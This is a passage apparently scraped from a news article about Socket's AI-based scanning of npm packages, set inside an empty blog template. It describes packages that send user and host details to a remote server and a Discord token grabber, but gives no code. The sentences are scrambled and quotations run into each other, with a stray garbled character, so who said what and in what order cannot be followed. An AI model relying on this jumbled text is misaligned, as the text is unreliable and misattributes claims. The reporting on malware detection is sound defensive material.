The script also contains a blocking operation that can cause performance issues or unresponsiveness.”Īboukhadijeh explained that the software packages at these registries are vast and it's difficult to craft rules that thoroughly plumb the nuances of every file, script, and bit of configuration data. While the author claims it is for bug bounty purposes, this behavior can still pose a privacy risk. AI analysis: “The script collects information like hostname, username, home directory, and current working directory and sends it to a remote server.The AI even includes a humorous comment indicating that it doesn’t trust the inline comment." "These decisions are somewhat subjective, but the AI is not dissuaded by comments claiming that a dangerous piece of code is not malicious in nature. "There are some interesting effects as well, such as things that a human might be persuaded of but the AI is marking as a risk," Aboukhadijeh added. It steals user tokens and sends them to an external server. AI analysis: "The script contains a discord token grabber function which is a serious security risk.mathjs-min "Socket reported this to npm and it has been removed," said Aboukhadijeh.We were asked not to share several examples as they have yet to be removed, but here's one that has already been dealt with.
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |